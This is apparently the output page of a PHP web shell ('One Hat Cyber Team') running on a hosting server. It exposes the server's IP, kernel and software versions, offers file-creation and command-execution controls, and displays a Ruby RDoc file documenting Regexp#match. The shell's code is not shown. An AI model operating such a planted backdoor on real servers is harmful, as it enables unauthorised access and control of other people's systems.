⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.133
Server IP:
185.119.109.197
Server:
Linux managedhosting.chostar.me 5.15.0-160-generic #170-Ubuntu SMP Wed Oct 1 10:06:56 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.1.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
self
/
root
/
usr
/
share
/
ri
/
3.0.0
/
system
/
Regexp
/
View File Name :
match-i.ri
U:RDoc::AnyMethod[iI" match:ETI"Regexp#match;TF:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [ I"9Returns a MatchData object describing the match, or ;TI"C
nil
if there was no match. This is equivalent to ;TI"Bretrieving the value of the special variable
$~
;TI"Gfollowing a normal match. If the second parameter is present, it ;TI">specifies the position in the string to begin the search.;To:RDoc::Markup::BlankLine o:RDoc::Markup::Verbatim; [I"+/(.)(.)(.)/.match("abc")[2] #=> "b" ;TI"+/(.)(.)/.match("abc", 1)[2] #=> "c" ;T:@format0o; ; [I"OIf a block is given, invoke the block with MatchData if match succeed, so ;TI"that you can write;T@o;; [ I""/M(.*)/.match("Matz") do |m| ;TI" puts m[0] ;TI" puts m[1] ;TI" end ;T; 0o; ; [I"instead of;T@o;; [ I""if m = /M(.*)/.match("Matz") ;TI" puts m[0] ;TI" puts m[1] ;TI" end ;T; 0o; ; [I"CThe return value is a value from block execution in this case.;T: @fileI" re.c;T:0@omit_headings_from_table_of_contents_below0I"prxp.match(str, pos=0) -> matchdata or nil rxp.match(str, pos=0) {|match| block } -> obj ;T0[ I"(p1, p2 = v2);T@-FI"Regexp;TcRDoc::NormalClass00